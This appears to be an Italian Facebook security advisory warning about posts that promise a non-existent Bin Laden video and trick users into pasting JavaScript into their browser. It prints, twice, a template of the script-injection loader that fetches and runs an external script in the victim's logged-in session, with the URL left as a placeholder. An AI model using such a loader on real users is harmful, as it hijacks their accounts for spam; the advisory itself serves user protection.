Il filmato-che-non-esiste dilaga su FB. NON eseguite codici javascript, nè utilizzate CTRL+C e V.
Dilagano post e messaggi che promettono di mostrare un video INESISTENTE sulla cattura di BinLaden. Sebbene non siano al momento segnalati malware o virus collegati alla procedura, vediamo come funziona il meccanismo e soprattutto come sia possibile evitare problemi al proprio profilo.
Premessa
Alcune istruzioni javascript permettono di simulare funzioni non presenti nel social network, quali la selezione di tutti gli amici per suggerire pagine, iscrizioni a gruppi, eventi, etc. Sebbene siano efficaci nella selezione immediata dei propri contatti, ne sconsigliamo comunque l’uso per evitare un potenziale blocco del proprio account (vi sono procedure automatiche che classificano tali attività come spam).
Nello scrivere queste righe immaginiamo anche che un utente finale non sia in grado di riconoscere un codice maligno da uno benigno, quando gli viene richiesto di inserire una serie di parole nella barra del proprio browser…
Il problema
E’ stata segnalata la presenza di diverse pagine che invitano gli utenti a copiare-incollare un codice javascript nella barra del browser, ma anche solo di premere CTRL+C e V per effettuare un copia-incolla di codice nascosto.
Vengono promesse FALSE funzioni speciali quali:
– visualizzazioni di filmati o immagini INESISTENTI
– scoprire chi visita il proprio profilo
– “immagini rotanti” su FB
– invito automatico di tutti gli amici a usare una pagina
– aumento dei fan della propria pagina
– invio di richieste di amicizia
– raccolta di gift per giochi di vario genere
– crediti gratuiti a volontà
– …
Alcuni esempi pratici
Il codice si presenta SOLITAMENTE con queste caratteristiche:
javascript: /.../ (a=(b=document).createElement('script')).src=[link a procedura esterna in php o js],b.body.appendChild(a);void(0) /.../
Tramite alcune istruzioni in javascript, residenti su server o pc esterni al social network, è possibile automatizzare alcune operazioni come se fossero eseguite direttamente dal vostro profilo: invio di messaggi (spam o scam), MiPiace a pagine e applicazioni, aggiunta di tag ad amici, etc.
(al problema “aggiunta di amministratori” a proprie pagine, FB ha provveduto ad aggiungere la richiesta di password per effettuare modifiche)
Attivando tali procedure, viene richiesto SEMPRE un periodo di attesa, durante il quale la pagina (solitamente un sito web esterno a FB) esegue le “istruzioni” automatiche a nome vostro, come se foste voi a farle dalla vostra tastiera utilizzando le informazioni presenti nei vostri cookie (le variabili legate al vostro profilo e al vostro accesso).
Il fenomeno attualmente NON E’ CLASSIFICABILE COME PHISHING: non vi è il furto di credenziali di accesso, ma il vostro profilo, mentre siete collegati, esegue una serie di operazioni predefinite inviando messaggi in chat o tramite email, pubblicando post, mettendo MiPiace a pagine e/o applicazioni, etc).
Il pericolo maggiore consiste nel blocco del profilo da parte di FB, se il social network registra un’attività anomala per numero di azioni/pubblicazioni in un periodo di tempo relativamente breve.
E’ IMPORTANTE non cadere in queste trappole.
Se vi è capitato, controllate la lista delle vostre pagine preferite, e cancellate quelle non gradite (vedi nota).
Controllate anche, nelle impostazioni della vostra privacy, se sono presenti applicazioni sconosciute ed eliminatele; è una buona abitudine eliminare anche quelle che non utilizzate più (vedi nota)
Se venite reindirizzati a siti che richiedono l’inserimento del vostro numero di cellulare (o altri dati personali) per lo “sblocco” di opzioni aggiuntive ricordate DI NON INSERIRE MAI NULLA (come minimo vi trovate ad aver sottoscritto abbonamenti a suonerie per cellulari).
PER QUESTO VI INVITIAMO A NON UTILIZZARE ALCUN CODICE JAVASCRIPT SUGGERITO DA PROFILI, APPLICAZIONI O PAGINE (interne o esterne a Facebook).
P.S. Se gradite le nostre note, cliccate cortesemente su MiPiace e Condividi: capita infatti che alcuni individui le segnalino come offensive e le facciano sparire. Questa brutta abitudine è contrastabile SOLO manifestando il proprio gradimento tramite il MiPiace e la condivisione (se il gradimento è reale, naturalmente).
SeeYouSoon
Nota a cura di Claudio Cerroni (Hunch – Assistenza e Consulenza Informatica).
Iscriviti alla nostra PaginaAggiornamenti per essere sempre aggiornato sui problemi di Facebook.
CheckBlackList | PaginaAggiornamenti | News | Facebook | Toolbar | WorkingOn
Il codice si presenta SOLITAMENTE con queste caratteristiche:
javascript: /.../ (a=(b=document).createElement('script')).src=[link a procedura esterna in php o js],b.body.appendChild(a);void(0) /.../
Tramite alcune istruzioni in javascript, residenti su server o pc esterni al social network, è possibile automatizzare alcune operazioni come se fossero eseguite direttamente dal vostro profilo: invio di messaggi (spam o scam), MiPiace a pagine e applicazioni, aggiunta di tag ad amici, etc.
(al problema “aggiunta di amministratori” a proprie pagine, FB ha provveduto ad aggiungere la richiesta di password per effettuare modifiche)
Attivando tali procedure, viene richiesto SEMPRE un periodo di attesa, durante il quale la pagina (solitamente un sito web esterno a FB) esegue le “istruzioni” automatiche a nome vostro, come se foste voi a farle dalla vostra tastiera utilizzando le informazioni presenti nei vostri cookie (le variabili legate al vostro profilo e al vostro accesso).
Il fenomeno attualmente NON E’ CLASSIFICABILE COME PHISHING: non vi è il furto di credenziali di accesso, ma il vostro profilo, mentre siete collegati, esegue una serie di operazioni predefinite inviando messaggi in chat o tramite email, pubblicando post, mettendo MiPiace a pagine e/o applicazioni, etc).
Il pericolo maggiore consiste nel blocco del profilo da parte di FB, se il social network registra un’attività anomala per numero di azioni/pubblicazioni in un periodo di tempo relativamente breve.
E’ IMPORTANTE non cadere in queste trappole.
- Se vi è capitato, controllate la lista delle vostre pagine preferite, e cancellate quelle non gradite (vedi nota).
- Controllate anche, nelle impostazioni della vostra privacy, se sono presenti applicazioni sconosciute ed eliminatele; è una buona abitudine eliminare anche quelle che non utilizzate più (vedi nota)
- Se venite reindirizzati a siti che richiedono l’inserimento del vostro numero di cellulare (o altri dati personali) per lo “sblocco” di opzioni aggiuntive ricordate DI NON INSERIRE MAI NULLA (come minimo vi trovate ad aver sottoscritto abbonamenti a suonerie per cellulari).
PER QUESTO VI INVITIAMO A NON UTILIZZARE ALCUN CODICE JAVASCRIPT SUGGERITO DA PROFILI, APPLICAZIONI O PAGINE (interne o esterne a Facebook).
P.S. Se gradite le nostre note, cliccate cortesemente su MiPiace e Condividi: capita infatti che alcuni individui le segnalino come offensive e le facciano sparire. Questa brutta abitudine è contrastabile SOLO manifestando il proprio gradimento tramite il MiPiace e la condivisione (se il gradimento è reale, naturalmente).
SeeYouSoon
Nota a cura di Claudio Cerroni (Hunch – Assistenza e Consulenza Informatica
).
Iscriviti alla nostra PaginaAggiornamenti per essere sempre aggiornato sui problemi di Facebook.
CheckBlackList | PaginaAggiornamenti | News | Facebook | Toolbar | WorkingOn